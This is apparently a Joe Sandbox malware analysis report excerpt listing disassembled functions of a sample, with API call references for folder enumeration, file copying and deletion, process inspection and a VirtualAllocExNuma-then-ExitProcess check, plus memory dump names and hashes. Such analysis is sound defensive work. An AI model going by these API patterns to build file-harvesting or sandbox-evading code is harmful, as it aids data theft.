lstrcat.KERNEL32(?,00000000), ref: 00934F7A
lstrcat.KERNEL32(?,00941070), ref: 00934F97
lstrcat.KERNEL32(?,006F9138), ref: 00934FAB
lstrcat.KERNEL32(?,00941074), ref: 00934FBD

Part of subcall function 00934910: wsprintfA.USER32 ref: 0093492C
Part of subcall function 00934910: FindFirstFileA.KERNEL32(?,?), ref: 00934943

Part of subcall function 00934910: StrCmpCA.SHLWAPI(?,00940FDC), ref: 00934971
Part of subcall function 00934910: StrCmpCA.SHLWAPI(?,00940FE0), ref: 00934987
Part of subcall function 00934910: FindNextFileA.KERNEL32(000000FF,?), ref: 00934B7D
Part of subcall function 00934910: FindClose.KERNEL32(000000FF), ref: 00934B92

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID:
API String ID: 2667927680-0
Opcode ID: 527adb0e5f4a3edfe5ef006e0a01ad93f140677e569c817554e1bdf48d72da04
Instruction ID: 888f7a5870411a518f3ca092e3371e10031d9b6e6c694d89a8e9aff4da38b7c7
Opcode Fuzzy Hash: 527adb0e5f4a3edfe5ef006e0a01ad93f140677e569c817554e1bdf48d72da04
Instruction Fuzzy Hash: 2D21477690020467CB54F760EC46FEE337DABD4700F004554F65AA71C5EEB5A6C98F92

Function 00930740 Relevance: 4.7, APIs: 3, Instructions: 217COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,006F9238), ref: 0093079A
StrCmpCA.SHLWAPI(00000000,006F91C8), ref: 00930866
StrCmpCA.SHLWAPI(00000000,006F91F8), ref: 0093099D

Part of subcall function 0093A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0093A7E6

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: e4c6ce8624060e20a17450707fe2684c438fe6a0e6dd430804a4d535502b58f4
Instruction ID: e8594130203e39b0da718edf6d1075c7e9ac615f43fe38eb7d21cc1fde7fc5b7
Opcode Fuzzy Hash: e4c6ce8624060e20a17450707fe2684c438fe6a0e6dd430804a4d535502b58f4
Instruction Fuzzy Hash: 46916675A102089FCB28EF64D995FEDB7B5BFD4300F408559E84A9F285DB30AA05CF92

Function 00930765 Relevance: 4.7, APIs: 3, Instructions: 197COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,006F9238), ref: 0093079A
StrCmpCA.SHLWAPI(00000000,006F91C8), ref: 00930866
StrCmpCA.SHLWAPI(00000000,006F91F8), ref: 0093099D

Part of subcall function 0093A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0093A7E6

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: dbaf2547c120bbcfffbd8d2c057bd4dd34df66e3f5525b7f1b5abd6466d3939f
Instruction ID: a93e4ff38e267239a980ac37185452d3d4af398fa7f3c13ee8475cd4b15370f0
Opcode Fuzzy Hash: dbaf2547c120bbcfffbd8d2c057bd4dd34df66e3f5525b7f1b5abd6466d3939f
Instruction Fuzzy Hash: 4B816675A102089FCB18EF64D991BEDB7B6FFD4300F508559E84A9B255DB30AA05CF82

Function 00934BB0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 118stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00938DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00938E0B

lstrcat.KERNEL32(?,00000000), ref: 00934BEA
lstrcat.KERNEL32(?,006FDBF0), ref: 00934C08

Part of subcall function 00934910: wsprintfA.USER32 ref: 0093492C
Part of subcall function 00934910: FindFirstFileA.KERNEL32(?,?), ref: 00934943

Part of subcall function 00934910: StrCmpCA.SHLWAPI(?,00940FDC), ref: 00934971
Part of subcall function 00934910: StrCmpCA.SHLWAPI(?,00940FE0), ref: 00934987
Part of subcall function 00934910: FindNextFileA.KERNEL32(000000FF,?), ref: 00934B7D
Part of subcall function 00934910: FindClose.KERNEL32(000000FF), ref: 00934B92

Part of subcall function 00934910: wsprintfA.USER32 ref: 009349B0
Part of subcall function 00934910: StrCmpCA.SHLWAPI(?,009408D2), ref: 009349C5
Part of subcall function 00934910: wsprintfA.USER32 ref: 009349E2
Part of subcall function 00934910: PathMatchSpecA.SHLWAPI(?,?), ref: 00934A1E
Part of subcall function 00934910: lstrcat.KERNEL32(?,006FEA18), ref: 00934A4A
Part of subcall function 00934910: lstrcat.KERNEL32(?,00940FF8), ref: 00934A5C
Part of subcall function 00934910: lstrcat.KERNEL32(?,?), ref: 00934A70
Part of subcall function 00934910: lstrcat.KERNEL32(?,00940FFC), ref: 00934A82
Part of subcall function 00934910: lstrcat.KERNEL32(?,?), ref: 00934A96
Part of subcall function 00934910: CopyFileA.KERNEL32(?,?,00000001), ref: 00934AAC
Part of subcall function 00934910: DeleteFileA.KERNEL32(?), ref: 00934B31

Part of subcall function 00934910: wsprintfA.USER32 ref: 00934A07

Strings

o, xrefs: 00934C0E, 00934C43, 00934C78, 00934CAE, 00934CE3, 00934D19

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: o
API String ID: 2104210347-3415972966
Opcode ID: 09d6b27423dc696cfdcffa82016aa5f83c1261c192c2c0cc5055b293c40ccfc3
Instruction ID: 4a39624c51bed91e39e0c24e466faa27951f66dc5c898a8ed6663051cbf764b0
Opcode Fuzzy Hash: 09d6b27423dc696cfdcffa82016aa5f83c1261c192c2c0cc5055b293c40ccfc3
Instruction Fuzzy Hash: 954156B650010467CB54F7A0EC42FEE733DABD5700F008548B645672C5EDB5AB988FD2

Function 6C653060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON

Download Yara Rule

APIs

?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C653095

Part of subcall function 6C6535A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C6DF688,00001000), ref: 6C6535D5
Part of subcall function 6C6535A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C6535E0
Part of subcall function 6C6535A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C6535FD
Part of subcall function 6C6535A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C65363F
Part of subcall function 6C6535A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C65369F
Part of subcall function 6C6535A0: __aulldiv.LIBCMT ref: 6C6536E4

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C65309F

Part of subcall function 6C675B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C6756EE,?,00000001), ref: 6C675B85
Part of subcall function 6C675B50: EnterCriticalSection.KERNEL32(6C6DF688,?,?,?,6C6756EE,?,00000001), ref: 6C675B90
Part of subcall function 6C675B50: LeaveCriticalSection.KERNEL32(6C6DF688,?,?,?,6C6756EE,?,00000001), ref: 6C675BD8
Part of subcall function 6C675B50: GetTickCount64.KERNEL32 ref: 6C675BE4

?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C6530BE

Part of subcall function 6C6530F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C653127
Part of subcall function 6C6530F0: __aulldiv.LIBCMT ref: 6C653140

Part of subcall function 6C68AB2A: __onexit.LIBCMT ref: 6C68AB30

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
String ID:
API String ID: 4291168024-0
Opcode ID: 0e0cdc154a02b5a123ad75d305439fadaf1b84d046cf834c0b44f7394be4601c
Instruction ID: 7e821f3c6f95d7c1e9a327f8a3053eed9933defdbf171d57371cc51e0863054d
Opcode Fuzzy Hash: 0e0cdc154a02b5a123ad75d305439fadaf1b84d046cf834c0b44f7394be4601c
Instruction Fuzzy Hash: 48F0D612D2078896CB10DF7588911A6B370AF6F114F545729F84463A61FB2071E883DE

Function 00939470 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 00939484
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 009394A5
CloseHandle.KERNEL32(00000000), ref: 009394AF

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: beb950f9a4dbd37fe290048606a556d6ef66de74c8a9a4bb006836de2a878fc1
Instruction ID: 3dd1d2318377615eaa3520877d42105eff41dd2cd8a2f6368be01f49f472beb4
Opcode Fuzzy Hash: beb950f9a4dbd37fe290048606a556d6ef66de74c8a9a4bb006836de2a878fc1
Instruction Fuzzy Hash: 80F0BD7590020CABDB15DF94DC4ABE97778EB08710F104554BA1957190DAB45A85CF91

Function 00921110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0092112B
VirtualAllocExNuma.KERNEL32(00000000), ref: 00921132
ExitProcess.KERNEL32 ref: 00921143

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: a4f673ccab7396b8d9afa148c50024c5e84fdf98005584cf7980fb6ced6e43d9
Instruction ID: 7ab0dfb2bf2fd12ef19502ed5a070f6baa9eb7a7c611b63f9c4794c912cce1f3
Opcode Fuzzy Hash: a4f673ccab7396b8d9afa148c50024c5e84fdf98005584cf7980fb6ced6e43d9
Instruction Fuzzy Hash: ABE0E670985308FBEB106BA0AC0AB197678AB04B01F104154F709771D5DAF92A509A99

Function 00DCA2E6 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,00000040,?), ref: 00DCA92E

Strings

V, xrefs: 00DCA8FF

Memory Dump Source

Source File: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
